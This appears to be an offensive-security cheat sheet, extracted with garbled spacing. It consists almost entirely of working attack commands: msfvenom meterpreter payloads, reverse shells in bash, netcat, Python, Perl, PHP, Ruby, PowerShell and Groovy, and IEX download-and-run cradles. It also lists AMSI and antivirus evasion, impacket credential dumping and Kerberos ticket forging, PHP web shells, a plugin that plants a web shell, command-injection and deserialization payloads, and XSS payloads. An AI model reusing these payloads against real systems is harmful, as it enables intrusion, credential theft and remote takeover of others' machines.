msfvenom - p windows /x64 /meterpreter /reverse_tcp LHOST = < LHOST > LPORT = < LPORT > - f exe - o < FILE > exe
msf6 > use exploit /multi /handler
[* ] Using configured payload generic /shell_reverse_tcp
msf6 exploit (multi /handler ) > set payload windows /x64 /meterpreter /reverse_tcp
payload = > windows /x64 /meterpreter /reverse_tcp
msf6 exploit (multi /handler ) > set LHOST < LHOST >
LHOST = > < LHOST >
msf6 exploit (multi /handler ) > set LPORT < LPORT >
LPORT = > < LPORT >
msf6 exploit (multi /handler ) > run
curl - H 'Cookie : () { :;}; /bin /bash - i > & /dev /tcp /< LHOST > /< LPORT > 0 > & 1 ' http ://<RHOST>/cgi-bin/user.sh
PS C :\> $str = 'amsiinitfailed '
PS C :\> $str = 'ams ' + 'ii ' + 'nitf ' + 'ailed '
Bypass List (Windows 10 Build 1803):
C:\Windows\Tasks
C:\Windows\Temp
C:\windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Tasks_Migrated (after peforming a version upgrade of Windows 10)
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System
powershell - c "$SecPass = Convertto-securestring 'Welcome1!' -AsPlainText -Force;$cred=New-Object System.Management.Automation.PScredential('administrator', $SecPass);Start-Process -FilePath 'C:\Users \Public \Downloads \nc .exe ' - argumentlist '- e cmd < LHOST > < LPORT > ' - Credential $cred "
Bash Privilege Escalation
id
sudo - l
uname - a
cat /etc /hosts
cat /etc /fstab
cat /etc /passwd
ss - tulpn
ps - auxf
ls - lahv
ls - R /home
Basic Windows Enumeration
systeminfo
whoami /all
net users
net users < USERNAME >
sudo ruby /usr /local /bin /evil - winrm - i < RHOST > - u < USERNAME > - p < PASSWORD >
find . / - type f - exec grep -- color = always - i - I 'password ' {} \;
find / - group < group > 2 > /dev /null
find / - user < USERNAME > 2 > /dev /null
find / - user < USERNAME > - ls 2 > /dev /null
find / - user < USERNAME > 2 > /dev /null | grep - v proc 2 > /dev /null
find / - user < USERNAME > - ls 2 > /dev /null | grep - v proc 2 > /dev /null
find / - perm - 4000 2 > /dev /null
find / - perm - 4000 2 > /dev /null | xargs ls - la
find / - type f - user root - perm - 4000 2 > /dev /null
grep - R db_passwd
grep - roiE "password.{20}"
grep - oiE "password.{20}" /etc /* .conf
impacket - smbserver local . - smb2support
impacket - reg < RHOST > /< USERNAME > :< PASSWORD :PASSWORD_HASH > @< RHOST > < ACTION > < ACTION >
impacket - services < RHOST > /< USERNAME > :< PASSWORD /PASSWORD_HASH > @< RHOST > < ACTION >
impacket - netview < RHOST > /< USERNAME > - targets /PATH /TO /FILE /< FILE > .txt - users /PATH /TO /FILE /< FILE > .txt
impacket - lookupsid < RHOST > /< USERNAME > :< PASSWORD /PASSWORD_HASH > @< RHOST >
impacket - GetADUsers - all - dc - ip < RHOST > < RHOST > /
impacket - getST < RHOST > /< USERNAME > - spn WWW /< DOMAIN_CONTROLLER > .< RHOST > - hashes :d64b83fe606e6d3005e20ce0ee932fe2 - impersonate Administrator
impacket - rpcdump < RHOST > /< USERNAME > :< PASSWORD /PASSWORD_HASH > @< RHOST >
impacket - samrdump < RHOST > /< USERNAME > :< PASSWORD /PASSWORD_HASH > @< RHOST >
impacket - atexec - k - no - pass < RHOST > /Administrator @< DOMAIN_CONTROLLER > .< RHOST > 'type C :\PATH \TO \FILE \<FILE > '
export KRB5CCNAME = < USERNAME > .ccache
impacket - smbclient < RHOST > /< USERNAME > :< PASSWORD /PASSWORD_HASH > @< RHOST >
impacket - smbclient - k < RHOST > /< USERNAME > @< RHOST > .< RHOST > - no - pass
impacket - getTGT < RHOST > /< USERNAME > :< PASSWORD >
impacket - getTGT < RHOST > /< USERNAME > - dc - ip < RHOST > - hashes aad3b435b51404eeaad3b435b51404ee :7 c662956a4a0486a80fbb2403c5a9c2c
impacket - GetNPUsers < RHOST > / - usersfile usernames .txt - format hashcat - outputfile hashes .asreproast
impacket - GetNPUsers < RHOST > /< USERNAME > - request - no - pass - dc - ip < RHOST >
impacket - GetNPUsers < RHOST > / - usersfile usernames .txt - format john - outputfile hashes
impacket-getUserSPNs / GetUserSPNs.py
export KRB5CCNAME = < USERNAME > .ccache
impacket - GetUserSPNs < RHOST > /< USERNAME > :< PASSWORD > - k - dc - ip < RHOST > .< RHOST > - no - pass - request
./GetUserSPNs .py < RHOST > /< USERNAME > :< PASSWORD > - k - dc - ip < RHOST > .< RHOST > - no - pass - request
export KRB5CCNAME = < USERNAME > .ccache
impacket - secretsdump < RHOST > /< USERNAME > @< RHOST >
impacket - secretsdump - k < RHOST > /< USERNAME > @< RHOST > .< RHOST > - no - pass - debug
impacket - secretsdump - ntds ndts .dit - system system - hashes lmhash:nthash LOCAL - output nt - hash
impacket - secretsdump - dc - ip < RHOST > < RHOST > .LOCAL /svc_bes :< PASSWORD > @< RHOST >
impacket - secretsdump - sam SAM - security SECURITY - system SYSTEM LOCAL
impacket - psexec < USERNAME > @< RHOST >
impacket - psexec < RHOST > /administrator @< RHOST > - hashes aad3b435b51404eeaad3b435b51404ee :8 a4b77d52b1845bfe949ed1b9643bb18
Valid User
NTHASH
Domain-SID
export KRB5CCNAME = < USERNAME > .ccache
impacket - ticketer - nthash C1929E1263DDFF6A2BCC6E053E705F78 - domain - sid S - 1 - 5 - 21 - 2743207045 - 1827831105 - 2542523200 - domain < RHOST > - spn MSSQLSVC /< RHOST > .< RHOST > - user - id 500 Administrator
Fixing [-] exceptions must derive from BaseException
./GetUserSPNs .py < RHOST > /< USERNAME > :< PASSWORD > - k - dc - ip < DOMAIN_CONTROLLER > .< RHOST > - no - pass - request
Impacket v0 .10 .0 - Copyright 2022 SecureAuth Corporation
[- ] exceptions must derive from BaseException
241 if self .__doKerberos :
242 #target = self.getMachineName()
243 target = self .__kdcHost
msfvenom - p windows /meterpreter /reverse_tcp LHOST = < LHOST > LPORT = < LPORT > - b "\x00\x0a" - a x86 -- platform windows - f exe - o exploit .exe
msf6 > use exploit /multi /handler
msf6 exploit (multi /handler ) > set payload windows /meterpreter /reverse_tcp
msf6 exploit (multi /handler ) > set LHOST < LHOST >
msf6 exploit (multi /handler ) > set LPORT < LHOST >
msf6 exploit (multi /handler ) > run
.\exploit .exe
PS C :\> set - executionpolicy remotesigned
PS C :\> Set - ExecutionPolicy unrestricted
PS C :\> powershell .exe - noprofile - executionpolicy bypass - file .\<FILE > .ps1
Import Module to PowerShell cmdlet
PS C :\> import - module ./< module / powershell script >
Check PowerShell Versions
PS Set - ExecutionPolicy Unrestricted
PS powershell - Command "$PSVersionTable.PSVersion"
PS powershell - c "[Environment]::Is64BitProcess"
PS /home /kali > $offsec_session = New - PSSession - ComputerName < RHOST > - Authentication Negotiate - Credential < USERNAME >
PS /home /kali > Enter - PSSession $offsec_session
Import - CliXml
Export - CliXml
PS C :\> powershell - c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"
AntiVirus Bypass for Invoke-Expression (IEX)
PS C :\> < COMMAND > | & ( $PsHOme [4 ]+ $PShoMe [30 ]+ 'x ')
$PSHome [4 ] // equals "i"
$PSHome [30 ] // equals "e"
+ x // adds an "x"
PS C :\> $eNV :COmSPeC [4 ,15 ,25 ]- JOiN ''
$eNV :COmSPeC [4 ] // equals "i"
$eNV :COmSPeC [15 ] // equals "e"
$eNV :COmSPeC [25 } // equals "x"
PS C :\> whoami /all
PS C :\> getuserid
PS C :\> net users
PS C :\> net users < USERNAME >
PS C :\> Get - ADUser - Filter * - SearchBase "DC=<RHOST>,DC=LOCAL"
Invoke-Expression File Transfer
PS C :\> IEX (IWR http ://<LHOST>/<FILE>.ps1) -UseBasicParsing)
Add new Domain Administrator
PS C :\> $PASSWORD = ConvertTo - SecureString –AsPlainText - Force - String < PASSWORD >
PS C :\> New - ADUser - Name "< USERNAME > " -Description " < DESCRIPTION > " -Enabled $true -AccountPassword $PASSWORD
PS C :\> Add - ADGroupMember - Identity "Domain Admins" - Member < USERNAME >
Execute Commands in User Context
PS C :\> $pass = ConvertTo - SecureString "< PASSWORD > " -AsPlaintext -Force
PS C :\> $cred = New - Object System .Management .Automation .PSCredential ("<DOMAIN>\<USERNAME>" , $pass )
PS C :\> Invoke - Command - computername < COMPUTERNAME > - ConfigurationName dc_manage - credential $cred - command {whoami }
Execute Scripts with Credentials (Reverse Shell)
PS C :\Windows \system32 > $pass = ConvertTo - SecureString "< PASSWORD > " -AsPlainText -Force
PS C :\Windows \system32 > $cred = New - Object System .Management .Automation .PSCredential ("<DOMAIN>\<USERNAME>" , $pass )
PS C :\Windows \system32 > Invoke - Command - Computer < RHOST > - ScriptBlock { IEX (New - Object Net .WebClient ).downloadString ('http ://<LHOST>/<FILE>.ps1') } -Credential $cred
PS C :\Users \<USERNAME > \Downloads \backups > $username = "<DOMAIN>\<USERNAME>"
$username = "<DOMAIN>\<USERNAME>"
PS C :\Users \<USERNAME > \Downloads \backups > $password = "<PASSWORD>"
$password = "<PASSWORD>"
PS C :\Users \<USERNAME > \Downloads \backups > $secstr = New - Object - TypeName System .Security .SecureString
$secstr = New - Object - TypeName System .Security .SecureString
PS C :\Users \<USERNAME > \Downloads \backups > $password .ToCharArray () | ForEach - Object {$secstr .AppendChar ($_ )}
$password .ToCharArray () | ForEach - Object {$secstr .AppendChar ($_ )}
PS C :\Users \<USERNAME > \Downloads \backups > $cred = new - object - typename System .Management .Automation .PSCredential - argumentlist $username , $secstr
$cred = new - object - typename System .Management .Automation .PSCredential - argumentlist $username , $secstr
PS C :\Users \<USERNAME > \Downloads \backups > new - pssession - computername . - credential $cred
new - pssession - computername . - credential $cred
Id Name ComputerName ComputerType State ConfigurationName Availability
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- -- -- -- -- -- -- -- - -- -- -- -- -- --
1 WinRM1 localhost RemoteMachine Opened Microsoft .PowerShell Available
PS C :\Users \<USERNAME > \Downloads \backups > enter - pssession 1
enter - pssession 1
[localhost ]: PS C :\Users \<USERNAME > \Documents > whoami
whoami
< DOMAIN > \<USERNAME >
tasklist /SVC
netsh firewall show state
schtasks /query /fo LIST /v
driverquery .exe /v /fo csv | ConvertFrom - CSV | Select - Object 'Display Name ', 'Start Mode ', Path
sc query
sc qc < service - name >
accesschk .exe - uws "Everyone " " C:\Program Files "
dir /s * pass * = = * cred * = = * vnc * = = * .config *
findstr /si password * .xml * .ini * .txt
wmic qfe get Caption ,Description ,HotFixID ,InstalledOn # no new patches - KEXP pretty likely
Writeable Directories in Linux
bash - i > & /dev /tcp /< LHOST > /< LPORT > 0 > & 1
bash - c 'bash - i > & /dev /tcp /< LHOST > /< LPORT > 0 > & 1 '
echo - n '/bin /bash - c "bin/bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1" ' | base64
curl -- header "Content-Type: application/json" -- request POST http ://<RHOST>:<RPORT>/upload --data '{"auth": {"name": "<USERNAME>", "password": "<PASSWORD>"}, "filename" : "& echo "bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1"|base64 -d|bash"}'
r = Runtime .getRuntime ()
p = r .exec (["/bin/bash" ,"-c" ,"exec 5<>/dev/tcp/<LHOST>/<LPORT>;cat <&5 | while read line; do \$line 2>&5 >&5; done" ] as String [])
p .waitFor ()
$ r = Runtime .getRuntime (); p = r .exec (["/bin/bash" ,"-c" ,"exec 5<>/dev/tcp/<LHOST>/<LPORT>;cat <&5 | while read line; do \$line 2>&5 >&5; done" ] as String []); p .waitFor ();
package < NAME > ;
import org .bukkit .plugin .java .JavaPlugin ;
import java .io .IOException ;
import java .nio .file .Files ;
import java .nio .file .Paths ;
import java .nio .file .StandardOpenOption ;
public class Main extends JavaPlugin {
@Override
public void onDisable () {
super .onDisable ();
}
@Override
public void onEnable () {
final String PHP_CODE = "<?php system($_GET['cmd']); ?>" ;
try {
Files .write (Paths .get ("/var/www/<RHOST>/shell.php" ), PHP_CODE .getBytes (), StandardOpenOption .CREATE_NEW );
} catch (IOException e ) {
e .printStackTrace ();
}
super .onEnable ();
}
}
http://<RHOST>');os.execute("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LHOST> <LPORT>/tmp/f")--
-- ';bash - i > & /dev /tcp /< LHOST > /< LPORT > 0 > & 1 ;'--
mkfifo /tmp /shell ; nc < LHOST > < LPORT > 0 < /tmp /shell | /bin /sh > /tmp /shell 2 > & 1 ; rm /tmp /shell
nc - e /bin /sh < LHOST > < LPORT >
perl - e 'use Socket ;$i = "<LHOST>" ;$p = < LPORT > ;socket (S ,PF_INET ,SOCK_STREAM ,getprotobyname ("tcp" ));if (connect (S ,sockaddr_in ($p ,inet_aton ($i )))){open (STDIN ,">&S" );open (STDOUT ,">&S" );open (STDERR ,">&S" );exec ("/bin/sh -i" );};'
php - r '$sock = fsockopen ("<LHOST>" ,< LPORT > );exec ("/bin/sh -i <&3 >&3 2>&3" );'
$client = New - Object System .Net .Sockets .TCPClient ("<LHOST>" ,< LPORT > );$stream = $client .GetStream ();[byte []]$bytes = 0. .65535 |%{0 };while (($i = $stream .Read ($bytes , 0 , $bytes .Length )) - ne 0 ){;$data = (New - Object - TypeName System .Text .ASCIIEncoding ).GetString ($bytes ,0 , $i );$sendback = (iex $data 2 > & 1 | Out - String );$sendback2 = $sendback + "# " ;$sendbyte = ( [text .encoding ]::ASCII ).GetBytes ($sendback2 );$stream .Write ($sendbyte ,0 ,$sendbyte .Length );$stream .Flush ()};$client .Close ()
powershell - nop - c "$client = New-Object System.Net.Sockets.TCPClient('<LHOST>',<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
powershell - nop - exec bypass - c '$client = New - Object System .Net .Sockets .TCPClient ("<LHOST>" ,< LPORT > );$stream = $client .GetStream ();[byte []]$bytes = 0. .65535 |%{0 };while (($i = $stream .Read ($bytes , 0 , $bytes .Length )) - ne 0 ){;$data = (New - Object - TypeName System .Text .ASCIIEncoding ).GetString ($bytes ,0 , $i );$sendback = (iex $data 2 > & 1 | Out - String );$sendback2 = $sendback + "PS " + (pwd ).Path + "> " ;$sendbyte = ( [text .encoding ]::ASCII ).GetBytes ($sendback2 );$stream .Write ($sendbyte ,0 ,$sendbyte .Length );$stream .Flush ()};$client .Close ()'
$socket = new - object System .Net .Sockets .TcpClient ('127.0 .0 .1 ', 413 );
if ($socket - eq $null ){exit 1 }
$stream = $socket .GetStream ();
$writer = new - object System .IO .StreamWriter ($stream );
$buffer = new - object System .Byte [] 1024 ;
$encoding = new - object System .Text .AsciiEncoding ;
do
{
$writer .Flush ();
$read = $null ;
$res = ""
while ($stream .DataAvailable - or $read - eq $null ) {
$read = $stream .Read ($buffer , 0 , 1024 )
}
$out = $encoding .GetString ($buffer , 0 , $read ).Replace ("`r`n" ,"" ).Replace ("`n" ,"" );
if (!$out .equals ("exit" )){
$args = "" ;
if ($out .IndexOf (' ' ) - gt - 1 ){
$args = $out .substring ($out .IndexOf (' ' )+ 1 );
$out = $out .substring (0 ,$out .IndexOf (' ' ));
if ($args .split (' ' ).length - gt 1 ){
$pinfo = New - Object System .Diagnostics .ProcessStartInfo
$pinfo .FileName = "cmd.exe"
$pinfo .RedirectStandardError = $true
$pinfo .RedirectStandardOutput = $true
$pinfo .UseShellExecute = $false
$pinfo .Arguments = "/c $out $args"
$p = New - Object System .Diagnostics .Process
$p .StartInfo = $pinfo
$p .Start () | Out - Null
$p .WaitForExit ()
$stdout = $p .StandardOutput .ReadToEnd ()
$stderr = $p .StandardError .ReadToEnd ()
if ($p .ExitCode - ne 0 ) {
$res = $stderr
} else {
$res = $stdout
}
}
else {
$res = (& "$out" "$args" ) | out - string ;
}
}
else {
$res = (& "$out" ) | out - string ;
}
if ($res - ne $null ){
$writer .WriteLine ($res )
}
}
}While (!$out .equals ("exit "))
$writer .close ();
$socket .close ();
$stream .Dispose ()
python - c 'import socket ,subprocess ,os ;s = socket .socket (socket .AF_INET ,socket .SOCK_STREAM );s .connect (("<LHOST>" ,< LPORT > ));os .dup2 (s .fileno (),0 ); os .dup2 (s .fileno (),1 ); os .dup2 (s .fileno (),2 );p = subprocess .call (["/bin/sh" ,"-i" ]);'
python3 - c 'import socket ,subprocess ,os ;s = socket .socket (socket .AF_INET ,socket .SOCK_STREAM );s .connect (("<LHOST>" ,< LPORT > ));os .dup2 (s .fileno (),0 ); os .dup2 (s .fileno (),1 ); os .dup2 (s .fileno (),2 );p = subprocess .call (["/bin/sh" ,"-i" ]);'
python - c 'import pty ,subprocess ,os ,time ;(master ,slave )= pty .openpty ();p = subprocess .Popen (["/bin/su" ,"-c" ,"id" ,"bynarr" ],stdin = slave ,stdout = slave ,stderr = slave );os .read (master ,1024 );os .write (master ,"fruity\n" );time .sleep (0.1 );print os .read (master ,1024 );'
echo python3 - c 'import socket ,subprocess ,os ;s = socket .socket (socket .AF_INET ,socket .SOCK_STREAM );s .connect (("<LHOST>" ,< LPORT > ));os .dup2 (s .fileno (),0 ); os .dup2 (s .fileno (),1 ); os .dup2 (s .fileno (),2 );p = subprocess .call (["/bin/sh" ,"-i" ]);' > < FILE > < ( ),2 );p = subprocess .call (["/bin/sh" ,"-i" ]);' > < FILE >
ruby - rsocket - e 'f = TCPSocket .open ("<LHOST>" ,< LPORT > ).to_i ;exec sprintf ("/bin/sh -i <&%d >&%d 2>&%d" ,f ,f ,f )'
< ?php system ($_GET ['cmd ' ]); ?>
< ?php echo exec ($_POST ['cmd ' ]); ?>
< ?php echo passthru ($_GET ['cmd ' ]); ?>
< ?php passthru ($_REQUEST ['cmd ' ]); ?>
< ?php echo system ($_REQUEST ['shell ' ]): ?>
cd path /to /nishang /Shells /
cp Invoke - PowerShellTcp .ps1 Invoke - PowerShellTcp .ps1
tail - 3 Invoke - PowerShellTcp .ps1
}
Invoke - PowerShellTcp - Reverse - IPAddress < LHOST > - Port < LPORT >
powershell "IEX(New-Object Net.Webclient).downloadString('http://<LHOST>:<LPORT>/Invoke-PowerShellTcp.ps1')"
msfvenom - p windows /shell_reverse_tcp LHOST = < LHOST > LPORT = < LPORT > - f c - a x86 -- platform windows - b "\x00\x0a\x0d" - e x86 /shikata_ga_nai
msfvenom - a x86 -- platform windows - p windows /shell /reverse_tcp LHOST = < LHOST > LPORT = < LPORT > - b "\x00" - e x86 /shikata_ga_nai - f exe - o /tmp /shell .exe
java - jar ysoserial - master - SNAPSHOT .jar
java - jar ysoserial - master - SNAPSHOT .jar CommonsCollections1 'nc < LHOST > < LPORT > - e /bin /sh ' | base64 - w 0
java - jar ysoserial .jar Groovy1 calc .exe > groovypayload .bin
java - jar ysoserial - master - 6eca5bc740 - 1. jar CommonsCollections4 "$jex" > /tmp /$filename .session
< ?xml version = "1.0" encoding = "UTF-8" ?>
< configuration >
< system .webServer >
< handlers accessPolicy = "Read, Script, Write" >
< add name = "web_config" path = "*.config" verb = "*" modules = "IsapiModule" scriptProcessor = "%windir%\system32\inetsrv\asp.dll" resourceType = "Unspecified" requireAccess = "Write" preCondition = "bitness64" />
< /handlers >
< security >
< requestFiltering >
< fileExtensions >
< remove fileExtension = ".config" />
< /fileExtensions >
< hiddenSegments >
< remove segment = "web.config" />
< /hiddenSegments >
< /requestFiltering >
< /security >
< /system .webServer >
< /configuration >
< !-- ASP code comes here ! It should not include HTML comment closing tag and double dashes !
< %
Set s = CreateObject ("WScript.Shell" )
Set cmd = s .Exec ("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://<LHOST>/shellyjelly.ps1')" )
o = cmd .StdOut .Readall ()
Response .write (o )
%>
-- >
- hosts : localhost
tasks :
- name : badyml
command : chmod + s /bin /bash
Exploit Skeleton Python Script
#!/usr /bin /python
import socket ,sys
address = '127.0 .0 .1 '
port = 9999
buffer = #TBD
try :
print '[+ ] Sending buffer '
s = socket .socket (socket .AF_INET , socket .SOCK_STREAM )
s .connect ((address ,port ))
s .recv (1024 )
s .send (buffer + '\r\n' )
except :
print '[!] Unable to connect to the application .'
sys .exit (0 )
finally :
s .close ()
POST /< path > HTTP /1.1
Host : < RHOST >
User - Agent : Mozilla /5.0 (X11 ; Linux x86_64 ; rv:78.0 ) Gecko /20100101 Firefox /78.0
Accept: * /*
Accept - Language : en - US ,en ;q = 0.5
Content - Type : application /json
Content - Length : 95
Connection: close
{
"auth" :{
"name" :"<USERNAME>" ,
"password" :"< PASSWORD > "
},
"filename" :"< FILE > "
}
< script > alert ('XSS ' )< /script >
< scr < script > ipt > alert ('XSS ' )< /scr < script > ipt >
"><script>alert('XSS')</script>
" > < script > alert (String .fromCharCode (88 ,83 ,83 ))< /script >
< script src = "http://<LHOST>/<FILE>" > < /script >
< img src = x onerror = alert ('XSS ' );>
< img src = x onerror = alert ('XSS ' )//
< img src = x onerror = alert (String .fromCharCode (88 ,83 ,83 ));>
< img src = x oneonerrorrror = alert (String .fromCharCode (88 ,83 ,83 ));>
< img src = x :alert (alt ) onerror = eval (src ) alt = xss >
"><img src=x onerror=alert('XSS');>
" > < img src = x onerror = alert (String .fromCharCode (88 ,83 ,83 ));>
< svgonload = alert (1 )>
< svg /onload = alert ('XSS ' )>
< svg onload = alert (1 )//
< svg /onload = alert (String .fromCharCode (88 ,83 ,83 ))>
< svg id = alert (1 ) onload = eval (id )>
"><svg/onload=alert(String.fromCharCode(88,83,83))>
" > < svg /onload = alert (/XSS / )
< svg > < script href = data :,alert (1 ) /> (`Firefox ` is the only browser which allows self closing script )
< div onpointerover = "alert(45)" > MOVE HERE < /div >
< div onpointerdown = "alert(45)" > MOVE HERE < /div >
< div onpointerenter = "alert(45)" > MOVE HERE < /div >
< div onpointerleave = "alert(45)" > MOVE HERE < /div >
< div onpointermove = "alert(45)" > MOVE HERE < /div >
< div onpointerout = "alert(45)" > MOVE HERE < /div >
< div onpointerup = "alert(45)" > MOVE HERE < /div >